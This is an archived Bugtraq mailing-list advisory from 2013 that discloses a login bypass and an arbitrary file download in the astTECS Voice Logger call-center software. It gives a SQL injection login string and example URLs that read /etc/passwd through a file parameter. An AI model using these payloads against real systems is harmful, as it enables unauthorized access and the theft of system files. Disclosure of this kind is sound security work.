Bugtraq mailing list archives

Voice Logger astTECS - bypass login & arbitrary file download

From: Michał Błaszczak <blaszczakm () gmail com>
Date: Tue, 16 Jul 2013 11:01:05 +0200

Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger  - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php


3) and other security bugs


Michał Błaszczak
http://blaszczakm.blogspot.com

Current thread:

Voice Logger astTECS - bypass login & arbitrary file download Michał Błaszczak (Jul 16)